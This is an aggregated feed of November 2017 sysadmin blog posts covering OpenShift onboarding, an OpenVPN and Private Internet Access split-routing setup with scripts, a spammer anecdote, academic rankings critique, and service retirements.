Don't allow for disrespectful USB messages!!!

November 14, 2017 08:49 PM

November 13, 2017

Steve Kemp's Blog

Paternity-leave is half-over

I'm taking the month of November off work, so that I can exclusively take care of our child. Despite it being a difficult time, with him teething, it has been a great half-month so far.

During the course of the month I've found my interest in a lot of technological things waning, so I've killed my account(s) on a few platforms, and scaled back others - if I could exclusively do child-care for the next 20 years I'd be very happy, but sadly I don't think that is terribly realistic.

My interest in things hasn't entirely vanished though, to the extent that I found the time to replace my use of etcd with consul yesterday, and I'm trying to work out how to simplify my hosting setup. Right now I have a bunch of servers doing two kinds of web-hosting:

Hosting static-sites is trivial, whether with a virtual machine, via Amazon's S3 service, or some other static-host such as netlify.

Hosting for "dynamic stuff" is harder. These days a trend for "serverless" deployments allows you to react to events and be dynamic, but not everything can be a short-lived piece of ruby/javascript/lambda. It feels like I could set up a generic platform for launching containers, or otherwise modernising FastCGI, etc, but I'm not sure what the point would be. (I'd still be the person maintaining it, and it'd still be a hassle. I've zero interest in selling things to people, as that only means more support.)

In short I have a bunch of servers, they mostly tick over unattended, but I'm not really sure I want to keep them running for the next 10+ years. Over time our child will deserve, demand, and require more attention which means time for personal stuff is only going to diminish.

Simplifying things now wouldn't be a bad thing to do, before it is too late.

November 13, 2017 10:00 PM

LZone - Sysadmin

Openshift Ultra-fast Bootstrap

Today I want to share some hints on ultra-fast bootstrapping developers to use Openshift. Given that adoption in your organisation depends on developers daring and wanting to use Kubernetes/Openshift I believe showing a clear and easy migration path is the way to go.

Teach the Basics by Failing!

Actually, why not treat Openshift as a user-friendly self-service? Approach it naively and try stuff.

So hold a workshop. Ask people to:
  1. Not use the CLI for now!!! Don't even think about it. Automation comes later!
  2. Login and create a project. That usually works well.
  3. Decide on Docker Image / Source to Image. In the second dialog of the project creation you get presented with those three tabs

    Let them choose their poison.

    Let the image pull fail because they don't find docker images and don't know that they cannot just fetch stuff from docker.com. Explain why this is the case. Show them where to find your preferred base and runtime images in your internal registry, which of course is already configured and ready to be used. Show them the base image you suggest.

    Let the template creation fail using an already prepared template. Show where to look up the build error and explain where to find the infamously hidden secrets option everyone needs.

  4. Once the first build fails: explain the logic of applications in Openshift and that they did not only create a project, but also an application. Show the difference of locating builds and deployments. Show how to access logs of both and how to find 'Edit' hidden in the 'Actions' menu.
  5. When the build fails due to SSH connection refused: Explain that (even when using a source secret you already prepared) you need to put the public key in your favourite SCM either globally, per project or per repo for the code pull to work.
  6. When people check the pod first and see it isn't running: Explain again and again the holy trinity of checking stuff:
    1. First check the build
    2. Then check the deployment
    3. Only then check if pods do come up
  7. Finally the pod is green! People will access the deployed application and ask you how? Now is the time to have a short excursion on services and routing. Maybe show an already configured default. If some service isn't accessible:
    1. Show how to get the pods TCP endpoint
    2. Show how to attach to a container via the GUI / CLI

Have Docs and Examples Ready

Most important of course is preparation. Do prepare
  1. Walkthrough screenshots
  2. At least one runtime template
  3. At least one base image on your own registry
  4. At least one S2I ready source repository with a hello-world app
  5. Global project settings with
    • a default SSH key for source pulling
    • access configured for your own docker registry
  6. Maybe make an example project visible for all newbies

Things to avoid...

This is of course quite opinionated, but think about it:
  • Talk everyone out of setting up Minishift. You just do not want to support this.
  • Talk everyone out of getting Compose, Swarm, ... to live alongside Openshift. You just do not want to support this. And save everyone the time spent on having both in their development toolchain.

Finally...

Be prepared to iterate this again and again as often as needed.

November 13, 2017 06:01 PM

November 12, 2017

LZone - Sysadmin

Docker disable ext4 journaling

Noteworthy point from the Remind Ops: when running docker containers on ext4, consider disabling journaling. Why? Because a throw-away, almost read-only filesystem doesn't need recovery on crash.

See also

November 12, 2017 08:25 PM

November 11, 2017

Pantz.org

OpenVPN with Private Internet Access and port forwarding

Intro

This post will show my setup using PIA (Private Internet Access) with OpenVPN on a Linux machine. Specifically, where only certain applications will utilize the VPN and the rest of the traffic will go out the normal ISP's default route. It will also show how to access the PIA API via a shell script, to open a forwarding port for inbound traffic. Lastly, I will show how to take all of the OpenVPN and PIA information and feed it to programs like aria2c or curl. The examples below were done on Ubuntu 16.04.

Packages and PIA Setup

Go signup for a PIA account.

# Install the packages you need, example uses apt-get
sudo apt-get install openvpn curl unzip

# make dir for PIA files and scripts
sudo mkdir -p /etc/openvpn/pia
cd /etc/openvpn/pia

# grab PIA openvpn files and unzip
url='https://www.privateinternetaccess.com/openvpn/openvpn.zip'
sudo curl -o openvpn.zip $url && sudo unzip openvpn.zip

OpenVPN password file

Now that we have PIA login info, let's make a password file so we don't have to put in a password every time we start OpenVPN. We just need to make a file with the PIA username on one line and the PIA password on the second line. So just use your favorite text editor and do this. The file should be called "pass" and put in the "/etc/openvpn/pia" directory. The scripts that are used later depend on this file being called "pass" and put in this specific directory. An example of what the file looks like is below.

piausername
piapassword123

Change permission on this file so only root can read it

sudo chmod 600 /etc/openvpn/pia/pass

OpenVPN config file

This is the OpenVPN config file that works with PIA, and that also utilizes the scripts that will be talked about further down in the page. Use your favorite editor, copy and paste this text to a file called "pia.conf", and put it in the "/etc/openvpn/pia" directory.

# PIA OpenVPN client config file 
client
dev tun

# make sure the correct protocol is used
proto udp

# use the vpn server of your choice
# only use one server at a time
# the ip addresses can change, so use dns names not ip's
# find more server names in .ovpn files
# only certain gateways support port forwarding
#remote us-east.privateinternetaccess.com 1198
#remote us-newyorkcity.privateinternetaccess.com 1198
#remote aus.privateinternetaccess.com 1198
#remote us-west.privateinternetaccess.com 1198
remote ca-toronto.privateinternetaccess.com 1198

resolv-retry infinite
nobind
persist-key
persist-tun
cipher aes-128-cbc
auth sha1

# ca.crt and pem files from openvpn.zip downloaded from pia
ca /etc/openvpn/pia/ca.rsa.2048.crt
crl-verify /etc/openvpn/pia/crl.rsa.2048.pem

tls-client
remote-cert-tls server

# path to password file so you don't have to input pass on startup
# file format is username on one line password on second line
# make it only readable by root with: chmod 600 pass
auth-user-pass /etc/openvpn/pia/pass

# this suppresses the caching of the password and user name
auth-nocache

comp-lzo
verb 1
reneg-sec 0
disable-occ

# allows the ability to run user-defined script
script-security 2

# Don't add or remove routes automatically, pass env vars to route-up
route-noexec

# run our script to make routes
route-up "/etc/openvpn/pia/openvpn-route.sh up"

OpenVPN route script

This is the script that the OpenVPN client will run at the end of startup. The magic happens in this script. Without this script OpenVPN will start the client and make the vpn connection the default route for the box. If you want that, then go into the pia.conf file and comment out the "script-security 2", "route-noexec", and "route-up ..." lines, then just fire up the client with "sudo openvpn --config /etc/openvpn/pia/pia.conf" and you're done.

If you don't want the vpn to take over your default route, then let's keep going. Now that you have left those lines in the pia.conf file, the following script will be run when the client starts, and it will set up a route that does not take over the default gateway, but just adds a secondary vpn gateway for programs to use. Open your favorite text editor and copy the script below into the file "/etc/openvpn/pia/openvpn-route.sh".

#!/bin/sh
# script used by OpenVPN to setup a route on Linux.
# used in conjunction with OpenVPN config file options
# script-security 2, route-noexec, route-up 
# script also requires route table rt2
# sudo bash -c 'echo "1 rt2" >> /etc/iproute2/rt_tables'

# openvpn variables passed in via env vars
rtname="rt2"
ovpnpia="/etc/openvpn/pia"
int=$dev
iplocal=$ifconfig_local
ipremote=$ifconfig_remote
gw=$route_vpn_gateway

if [ -z $int ] || [ -z $iplocal ] || [ -z $ipremote ] || [ -z $gw ]; then
  echo "No env vars found. Use this script with an OpenVPN config file "
  exit 1
fi

help() {
  echo "For setting OpenVPN routes on Linux."
  echo "Usage: $0 up or down"
}

down() {
  # delete vpn route if found
  ip route flush table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully flushed route table $rtname"
  else
    echo "Failed to flush route table $rtname"
  fi    
}

up() {
  # using OpenVPN env vars that get set when it starts, see man page
  echo "Tunnel on interface $int. File /tmp/vpnint"
  echo $int > /tmp/vpnint
  echo "Local IP is         $iplocal. File /tmp/vpnip"
  echo $iplocal > /tmp/vpnip
  echo "Remote IP is        $ipremote"
  echo "Gateway is          $gw"

  down # remove any old routes

  ip route add default via $gw dev $int table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully added default route $gw"
  else
    echo "Failed to add default route for gateway $gw"
  fi
  ip rule add from $iplocal/32 table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully added local interface 'from' rule for $iplocal"
  else
    echo "Failed to add local interface 'from' rule for $iplocal"
  fi
  ip rule add to $gw/32 table $rtname
  if [ $? -eq 0 ]; then
    echo "Successfully added local interface 'to' rule for $gw"
  else
    echo "Failed to add local interface 'to' rule for $gw"
  fi

  # PIA port forwarding, only works with certain gateways
  # No US locations, closest US is Toronto and Montreal
  # no network traffic works during exec of this script
  # things like curl hang if not backgrounded
  $ovpnpia/pia_port_fw.sh &
}

case $1 in
  "up") up;;
  "down") down;;
  *) help;;
esac

# always flush route cache 
ip route flush cache

Now run some final commands to get the script ready to work

# make the new script executable
sudo chmod 755 /etc/openvpn/pia/openvpn-route.sh

# make a new route table rt2 in linux for the script to use
# this only has to be run once before you connect the first time
sudo bash -c 'echo "1 rt2" >> /etc/iproute2/rt_tables'

PIA port forward script

The following script is run by the openvpn-route.sh script. It will contact a PIA server and tell it to open a port for incoming traffic on your vpn connection. This is so people on the internet can contact your machine through the vpn connection. Just an important note that currently only a certain list of PIA gateways support port forwarding. See the PIA support article on this for more info. Now, open your favorite text editor and copy the script below into the file "/etc/openvpn/pia/pia_port_fw.sh".

#!/bin/bash
# Get forward port info from PIA server

client_id=$(head -n 100 /dev/urandom | sha256sum | tr -d " -")
url="http://209.222.18.222:2000/?client_id=$client_id"

echo "Making port forward request..."

curl --interface $(cat /tmp/vpnint) $url 2>/dev/null > /tmp/vpnportfwhttp

if [ $? -eq 0 ]; then
  port_fw=$(grep -o '[0-9]\+' /tmp/vpnportfwhttp)
  [ -f /tmp/vpnportfw ] && rm /tmp/vpnportfw
  echo $port_fw > /tmp/vpnportfw
  echo "Forwarded port is $port_fw"
  echo "Forwarded port is in file /tmp/vpnportfw"
else
  echo "Curl failed to get forwarded PIA port in some way"
fi

# make the new script executable
sudo chmod 755 /etc/openvpn/pia/pia_port_fw.sh

Starting OpenVPN

Finally we can start OpenVPN to connect with PIA. To do this run the following command. It will keep the connection in the foreground so you can watch the output.

sudo openvpn --config /etc/openvpn/pia/pia.conf

During startup, the OpenVPN client and both of the scripts we made will report data about the connection on the screen, along with any errors. The output will look like the following example.

Fri Nov 10 19:40:50 2017 OpenVPN 2.3.10 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [PKCS11] [MH] [IPv6] built on Jun 22 2017
Fri Nov 10 19:40:50 2017 library versions: OpenSSL 1.0.2g  1 Mar 2016, LZO 2.08
Fri Nov 10 19:40:50 2017 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Fri Nov 10 19:40:50 2017 UDPv4 link local: [undef]
Fri Nov 10 19:40:50 2017 UDPv4 link remote: [AF_INET]172.98.67.111:1198
Fri Nov 10 19:40:50 2017 [dbacd7b38d135021a698ed95e8fec612] Peer Connection Initiated with [AF_INET]172.98.67.111:1198
Fri Nov 10 19:40:53 2017 TUN/TAP device tun0 opened
Fri Nov 10 19:40:53 2017 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Fri Nov 10 19:40:53 2017 /sbin/ip link set dev tun0 up mtu 1500
Fri Nov 10 19:40:53 2017 /sbin/ip addr add dev tun0 local 10.24.10.10 peer 10.24.10.9
Tunnel on interface tun0. File /tmp/vpnint
Local IP is         10.24.10.10. File /tmp/vpnip
Remote IP is        10.24.10.9
Gateway is          10.24.10.9
Successfully flushed route table rt2
Successfully added default route 10.24.10.9
Successfully added local interface 'from' rule for 10.24.10.10
Successfully added local interface 'to' rule for 10.24.10.9
Fri Nov 10 19:40:53 2017 Initialization Sequence Completed
Making port forward request...
Forwarded port is 40074
Forwarded port is in file /tmp/vpnportfw

Using the vpn connection

When the vpn started it dropped some files in /tmp. These files have the ip and port info we need to give to different programs when they start up. The scripts created the following files.

  • /tmp/vpnip - ip address of the vpn
  • /tmp/vpnportfw - incoming port being forwarded from the internet to the vpn
  • /tmp/vpnint - interface of the vpn

Now you can use this info when you start certain programs. Here are some examples.

# get vpn incoming port
pt=$(cat /tmp/vpnportfw)

# get vpn ip
ip=$(cat /tmp/vpnip)

# get vpn interface
int=$(cat /tmp/vpnint)

# wget a file via vpn
wget --bind-address=$ip https://ipchicken.com

# curl a file via vpn
curl --interface $int https://ipchicken.com

# ssh to server via vpn
ssh -b $ip 

# rtorrent 
/usr/bin/rtorrent -b $ip -p $pt-$pt -d /tmp

# start aria2c and background. use aria2 WebUI to connect download files
aria2c --interface=$ip --listen-port=$pt --dht-listen-port=$pt > /dev/null 2>&1 &
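
If the machine runs a host firewall, you will probably also want to accept the forwarded port on the vpn interface. A minimal sketch with iptables (adjust to whatever firewall tooling you actually use):

# allow incoming traffic on the PIA-forwarded port, but only on the vpn interface
sudo iptables -A INPUT -i $(cat /tmp/vpnint) -p tcp --dport $(cat /tmp/vpnportfw) -j ACCEPT
sudo iptables -A INPUT -i $(cat /tmp/vpnint) -p udp --dport $(cat /tmp/vpnportfw) -j ACCEPT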

Final notes and warnings

If you start any programs and don't specifically bind them to the vpn interface or its ip address, their connections will go out the default interface for the machine. Please remember this setup only sends specific traffic through the vpn, so things like DNS requests still go through the non-vpn default gateway.
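
A quick way to see where traffic actually exits is to compare a normal lookup with one bound to the vpn address (a small sketch; it assumes dig is installed and uses OpenDNS's "myip" trick):

# not bound to the vpn: the answer is your normal ISP address
dig @resolver1.opendns.com myip.opendns.com +short

# bound to the vpn ip: the answer should be the PIA exit address
dig -b $(cat /tmp/vpnip) @resolver1.opendns.com myip.opendns.com +short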

Remember, only certain PIA gateways support port forwarding, so if it is not working, try another PIA gateway.

PIA has a Linux vpn client that you can download and use if you are into GUIs.

by Pantz.org at November 11, 2017 03:50 AM

November 10, 2017

syslog.me

Lies, damn lies, and spammers in disguise

Everyone gets so many unsolicited commercial emails these days that you just become blind to them, at best. Sometimes they are clearly, expressly commercial. Other times, they try to get past your attention and your spam checker by disguising themselves as legitimate emails. I have a little story about that.

A couple of weeks ago I got yet another spammy mail. It was evidently sent through a mass mailing and, as such, also included an unsubscribe link; however, the guy was trying to legitimize his spam by saying that he approached me specifically because a colleague had referred me to him. In addition, I felt that some keywords were added to his message only to make it sound “prettier” or even more legitimate.

I usually don’t spend time on spammers, but when I do I try to do it well. On this occasion I had a little time to spend on it, and I did. On October 30th I was walking to my eye doctor’s when I saw an email notification on my phone. The email said the following (note: the highlights are mine):

Marco,
I was sent your way as the person who is responsible for application security testing and understand XXXXXX would be of interest to Telenor. To what lies within our next generation penetration testing abilities, XXXXXX can bring to you:
  • Periodic pen tests in uncovering serious vulnerabilities and (lack of) continuous application testing to support dynamic DevOps SDLC.
  • An ROI of 53% or higher with the ability to Identify, locate and resolve all vulnerabilities
  • Averaging 35-40% critical vulnerabilities found overall, others average 28%.
  • Over 500 international top class security researchers deployed in large teams of 40-60 ethical hackers.
We have pioneered a disruptive, ethical hacker powered application testing approach deploying large teams of senior security researchers with hacker mimicking mindsets to rapidly uncover exploits in your applications.
I would like to find some time for a conversation during November, to give you the insight into why Microsoft and Hewlett-Packard Enterprise have invested in us and why SAP is our top global reseller.
Many thanks,
Geoffrey XXXXXX
Business Development Manager

Now, we have our mailboxes on GMail and my usual method of procedure for such spammy crap from clueless salespeople is:

  • block the sender
  • unsubscribe
  • report the mail as spam

But now it’s different: first, this guy is probably trying to legitimize himself with lies for sending me shit that I had not requested; second, despite the “personal” approach, this was clearly a mass mailing, so the whole story was clearly a lie; third, I was going to sit and wait at the doctor’s for some time, and I could invest that time in running down the guy. My reply:

Kindly let me know who sent you my way, so that I can double check that. Then, maybe, we can talk.

The guy replies soon after. New mail, new lie:

Hi Marco,

Apologies for not including that in the email and I am more than happy to say how I got to you.

I have spoken to Ragnar Harper around how this may become beneficial to Telenor and he has mentioned your name during the conversations. As I have been unable to get back in contact with Ragnar I thought it best that I could gain your input into this moving forward by having some time aligned in our diaries to discuss more?

[…additional crap redacted…]

Not only had I never met or talked with any Ragnar Harper: the guy was not in our Company’s ERP. In my eyes, Mr. Geoffrey was lying right down the line. Time to get rid of him:

There is no Ragnar Harper here

Your emails will hereby be blocked and reported as Spam

Goodbye
— MM

You may think he stopped there. Well, he didn’t:

Apologies but I just phoned the switchboard and he left last month.

Above is his linkedin profile as well.
Sorry for the confusion.
Geoff
So he had this beautiful relationship with Ragnar Harper, to the point that they talked together about Geoff’s products and Ragnar pointed him to me as the “person responsible for application security” (which I am not…), and yet he didn’t even know that Ragnar had left the company. But there is more: to find that out, he didn’t call Ragnar: he had to call the switchboard and check LinkedIn. Geoff is clearly clutching at straws. My reply:

You just picked up a random name. You are trying to sell me something for security, which should entail a certain amount of trust in your company, and you start the interaction with a lie: not bad for someone moved by an “ethical hacking” spirit.

There can’t be any trust between me and your company. Your messages are already landing in my spam folder and that’s where they shall be. Just go and try your luck with someone else, “Geoffrey”.

The king is naked, they say. Now he gotta stop, you think. He didn’t:

Thank you for your time Marco and I am sorry that you feel that way.

If you believe that it has started on a lie then that may well be your choice as I have been in contact with Ragnar since my days at YYYYYY before joining XXXXXX and we have yet to catch up this month since he has now departed. I shall head elsewhere as requested as that is not the kind of reputation that we uphold here.

Best wishes,

Geoff

Uh, wait a minute. Did I beat the guy for no reason? Could it be that he actually knew this ex-colleague Ragnar Harper and I am assuming too much? Is it all a misunderstanding? If it is, I want to know and apologise. As said, I had never met or talked to Ragnar Harper, but I can still try to contact him through LinkedIn:

Question from an ex colleague

Hei Ragnar. My name is Marco Marongiu, I am the Head of IT in Telenor Digital. I apologize for bothering you, it’s just a short question: have you referred me to a Sales person called Geoffrey XXXXXX from a Security company called XXXXXX?

This person approached me via email. Long story short, he says he knows you personally and that you sent him my way (to use his words). Is it something that you can confirm?

We two have never met in Telenor so that sounded strange and I handled him as a spammer. But if that is actually true I do want to send the guy my apologies. Thanks in any case

Med vennlig hilsen

— Marco

I am grateful that Ragnar took some time to reply and confirm my suspicion: he had never known or met the guy. I thanked Ragnar and stopped talking to “Geoffrey”. At the same time I thought it was a good story to tell, so here we go.

 

 


Tagged: spammers

by bronto at November 10, 2017 07:00 PM

November 09, 2017

Everything Sysadmin

November NYC DevOps Meetup: Building a hybrid cloud

Taras Lipatov, Principal Engineer at Sailthru, will describe his experience building a hybrid cloud using docker/mesos/consul at the Tuesday, November 14, 2017 nycdevops meetup. More info and RSVP at https://www.meetup.com/nycdevops/events/241852995/. RSVP soon! See you there!

by Tom Limoncelli at November 09, 2017 03:00 PM

November 08, 2017

Everything Sysadmin

Operational Excellence in April Fools' Pranks

This issue's column in ACMQueue Magazine is titled, "Operational Excellence in April Fools' Pranks". You can read it on the Queue app: http://queue.acm.org/app/

by Tom Limoncelli at November 08, 2017 08:41 PM

Cryptography Engineering

A few thoughts on CSRankings.org

(Warning: nerdy inside-baseball academic blog post follows. If you’re looking for exciting crypto blogging, try back in a couple of days.)

If there’s one thing that academic computer scientists love (or love to hate), it’s comparing themselves to other academics. We don’t do what we do for the big money, after all. We do it — in large part — because we’re curious and want to do good science. (Also there’s sometimes free food.) But then there’s a problem: who’s going to tell us if we’re doing good science?

To a scientist, the solution seems obvious. We just need metrics. And boy, do we get them. Modern scientists can visit Google Scholar to get all sorts of information about their citation count, neatly summarized with an “H-index” or an “i10-index”. These metrics aren’t great, but they’re a good way to pass an afternoon filled with self-doubt, if that’s your sort of thing.

But what if we want to do something more? What if we want to compare institutions as well as individual authors? And even better, what if we could break those institutions down into individual subfields? You could do this painfully on Google Scholar, perhaps. Or you could put your faith in the abominable and apparently wholly made-up U.S. News rankings, as many academics (unfortunately) do.

Alternatively, you could actually collect some data about what scientists are publishing, and work with that.

This is the approach of a new site called “Computer Science Rankings”. As best I can tell, CSRankings is largely an individual project, and doesn’t have the cachet (yet) of U.S. News. At the same time, it provides researchers and administrators with something they love: another way to compare themselves, and to compare different institutions. Moreover, it does so with real data (rather than the Ouija board and blindfold that U.S. News uses). I can’t see it failing to catch on.

And that worries me, because the approach of CSRankings seems a bit arbitrary. And I’m worried about what sort of things it might cause us to do.

You see, people in our field take rankings very seriously. I know folks who have moved their families to the other side of the country over a two-point difference in the U.S. News rankings — despite the fact that we all agree those are absurd. And this is before we consider the real impact of rankings (individual and institutional) on salaries, promotions, and awards. People optimize their careers and publications to maximize these stats, not because they’re bad people, but because they’re (mostly) rational and that’s what rankings inspire rational people to do.

To me this means we should think very carefully about what our rankings actually say.

Which brings me to the meat of my concerns with CSRankings. At a glance, the site is beautifully designed. It allows you to look at dozens of institutions, broken down by CS subfield. Within those subfields it ranks institutions by a simple metric: adjusted publication counts in top conferences by individual authors.

The calculation isn’t complicated. If you wrote a paper by yourself and had it published in one of the designated top conferences in your field, you’d get a single point. If you wrote a paper with a co-author, then you’d each get half a point. If you wrote a paper that doesn’t appear in a top conference, you get zero points. Your institution gets the sum-total of all the points its researchers receive.
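
To make the arithmetic concrete, here is a toy sketch in awk. It assumes a hypothetical papers.csv with one row per author of a paper, in the form paper_id,institution,num_authors,is_top_conference; neither the file nor the field layout comes from CSRankings itself:

# each top-conference row credits 1/num_authors to that author's institution
awk -F, '$4 == 1 { score[$2] += 1 / $3 }
         END     { for (inst in score) printf "%s\t%.2f\n", inst, score[inst] }' papers.csv |
  sort -t$'\t' -k2 -rn

A solo paper is worth a full point to its institution, while every extra co-author dilutes each share, which is exactly the incentive problem described below.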

If you believe that people are rational actors who optimize for rankings, you might start to see the problem.

First off, what CSRankings is telling us is that we should ditch those pesky co-authors. If I could write a paper with one graduate student, but a second student also wants to participate, tough cookies. That’s the difference between getting 1/2 a point and 1/3 of a point. Sure, that additional student might improve the paper dramatically. They might also learn a thing or two. But on the other hand, they’ll hurt your rankings.

(Note: currently on CSRankings, graduate students at the same institution don’t get included in the institutional rankings. So including them on your papers will actually reduce your school’s rank.)

I hope it goes without saying that this could create bad incentives.

Second, in fields that mix systems and theory — like computer security — CSRankings is telling us that theory papers (which typically have fewer authors) should be privileged in the rankings over systems papers. This creates both a distortion in the metrics, and also an incentive (for authors who do both types of work) to stick with the one that produces higher rankings. That seems undesirable. But it could very well happen if we adopt these rankings uncritically.

Finally, there’s this focus on “top conferences”. One of our big problems in computer science is that we spend a lot of our time scrapping over a very limited number of slots in competitive conferences. This can be ok, but it’s unfortunate for researchers whose work doesn’t neatly fit into whatever areas those conference PCs find popular. And CSRankings gives zero credit for publishing anywhere but those top conferences, so you might as well forget about that.

(Of course, there’s a question about what a “top conference” even is. In Computer Security, where I work, CSRankings does not consider NDSS to be a top conference. That’s because only three conferences are permitted for each field. The fact that this number seems arbitrary really doesn’t help inspire a lot of confidence in the approach.)

So what can we do about this?

As much as I’d like to ditch rankings altogether, I realize that this probably isn’t going to happen. Nature abhors a vacuum, and if we don’t figure out a rankings system, someone else will. Hell, we’re already plagued by U.S. News, whose methodology appears to involve a popcorn machine and live tarantulas. Something, anything, has to be better than this.

And to be clear, CSRankings isn’t a bad effort. At a high level it’s really easy to use. Even the issues I mention above seem like things that could be addressed. More conferences could be added, using some kind of metric to scale point contributions. (This wouldn’t fix all the problems, but would at least mitigate the worst incentives.) Statistics could perhaps be updated to adjust for graduate students, and soften the blow of having co-authors. These things are not impossible.

And fixing this carefully seems really important. We got it wrong in trusting U.S. News. What I’d like is for computer scientists, this time, to actually sit down and think this one out before someone imposes a ranking system on top of us. What behaviors are we trying to incentivize? Is it smaller author lists? Is it citation counts? Is it publishing only in a specific set of conferences?

I don’t know that anyone would agree uniformly that these should be our goals. So if they’re not, let’s figure out what they really are.


by Matthew Green at November 08, 2017 04:28 PM

November 01, 2017

Steve Kemp's Blog

Possibly retiring blogspam.net

For the past few years I've hosted a service for spam-testing blog/forum comments, and I think it is on the verge of being retired.

The blogspam.net service presented a simple API for deciding whether an incoming blog/forum comment was SPAM, in real-time. I used it myself for two real reasons:

  • For the Debian Administration website.
    • Which is now retired.
  • For my blog
    • Which still sees a lot of spam comments, but which are easy to deal with because I can execute Lua scripts in my mail-client

As a result of the Debian-Administration server cleanup I'm still in the process of tidying up virtual machines, and servers. It crossed my mind that retiring this spam-service would allow me to free up another host.

Initially the service was coded in Perl using XML/RPC. The current version of the software, version 2, is written as a node.js service, and despite the async-nature of the service it is still too heavy-weight to live on the host which runs most of my other websites.

It was suggested to me that rewriting it in golang might allow it to process more requests, with fewer resources, so I started reimplementing the service in golang at 4AM this morning.

The service does the minimum (a sample request is sketched after this list):

  • Receives incoming HTTP POSTS
  • Decodes the body to a struct
  • Loops over that struct and calls each "plugin" to process it.
    • If any plugin decides this is spam, it returns that result.
  • Otherwise if all plugins have terminated then it decides the result is "OK".
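
Purely to illustrate that flow, a request to such a JSON-over-HTTP spam checker might look like the sketch below. The port, path and field names are invented for the example and are not the real blogspam API:

# hypothetical endpoint and fields, for illustration only
curl -s -X POST http://localhost:9999/classify \
     -H 'Content-Type: application/json' \
     -d '{"site": "example.com", "name": "Bob", "comment": "Buy cheap pills now!"}'
# if any plugin flags the comment the service answers with a SPAM verdict, otherwise OK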

I've ported several plugins, I've got 100% test-coverage of those plugins, and the service seems to be faster than the node.js version - so there is hope.

Of course the real test will be when it is deployed for real. If it holds up for a few days I'll leave it running. Otherwise the retirement notice I placed on the website, which chances are nobody will see, will be true.

The missing feature at the moment is keeping track of the count of spam-comments rejected/accepted on a per-site basis. Losing that information might be a shame, but I think I'm willing to live with it, if the alternative is closing down..

November 01, 2017 10:00 PM

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – October 2017

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts based on last
month’s visitor data  (excluding other monthly or annual round-ups):
  1. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here – and we are updating it now.
  2. “Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge.  Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” … 
  3. “Simple Log Review Checklist Released!” is often at the top of this list – this rapidly aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
  4. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials. 
  5. “SIEM Bloggables”  is a very old post, more like a mini-paper on  some key aspects of SIEM, use cases, scenarios, etc as well as 2 types of SIEM users. Still very relevant, if not truly modern.
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X the traffic of this blog]: 

Current research on SOAR:
Miscellaneous fun posts:

(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Previous post in this endless series:

by Anton Chuvakin (anton@chuvakin.org) at November 01, 2017 05:44 PM

October 31, 2017

ma.ttias.be

Fall cleaning: shutting down some of my projects

The post Fall cleaning: shutting down some of my projects appeared first on ma.ttias.be.

Just a quick heads-up, I'm taking several of my projects offline as they prove to be too much of a hassle.

Mailing List Archive

Almost 2 years ago, I started a project to mirror/archive public mailing lists in a readable, clean layout. It's been fun, but quite a burden to maintain. In particular:

  • The mailing list archive now consists of ~3.500.000 files, which meant special precautions with filesystems (running out of inodes) & other practical concerns related to backups.
  • Abuse & take-down reports: lots of folks mailed a public mailing list, apparently not realizing it would be -- you know -- public. So they ask for their name & email to be removed from those that mirror it. Like me.

    Or, in one spectacular case, a take down request by Italian police because of some drug-related incident on the Jenkins public mailing list. Fun stuff. It involved threatening lawyer mails that I quickly complied with.

All of that combined, it isn't worth it. It got around 1.000 daily pageviews, mostly from the Swift mailing list community. Sorry folks, it's gone now.

This also means the death of the @foss_security & @oss_announce Twitter accounts, since those were built on top of the mailing list archive.

Manpages Archive

I ran a manpages archive on man.ttias.be, but nobody used it (or knew about it), so I deleted it. Also hard to keep up to date, with different versions of packages & different manpages etc.

Also, it's surprisingly hard to download all manpages, extract them, turn them into HTML & throw them on a webserver. Who knew?!

Coinjump

This was a wild idea where I tried to crowdsource the meaning behind cryptocurrency price jumps. A coin can increase in value at a rate of 400% or more in just a few hours; the idea was to find the reason behind it and learn from it.

It also fueled the @CoinJumpApp account on Twitter, but that's dead now too.

The source is up on Github, but I'm no longer maintaining it.

More time for other stuff!

Either way, some projects just cause me more concern & effort than I care to put into them, so time to clean that up & get some more mental braincycles for different projects!

The post Fall cleaning: shutting down some of my projects appeared first on ma.ttias.be.

by Mattias Geniar at October 31, 2017 08:25 PM

October 30, 2017

ma.ttias.be

Staat der Nederlanden CA might be revoked from Mozilla Policy?

The post Staat der Nederlanden CA might be revoked from Mozilla Policy? appeared first on ma.ttias.be.

The official Dutch CA "Staat der Nederlanden" is currently under review by the Mozilla foundation after the new intelligence and security services law was passed, which gives the government (legal) authority to act as a man-in-the-middle on legitimate TLS connections.

This could have far reaching consequences. They currently have 20+ root & intermediate certificates accepted.

Note there's still a question mark in the subject, this decision isn't certain or final yet.

Became vulnerable to MitM attacks.

The new "Wet op de inlichtingen- en veiligheidsdiensten (Wiv)" (Law for intelligence and security services) has been accepted by the Dutch Government. Provisions authorizing new powers for the dutch intelligence and security services will become active starting January 1st, 2018.

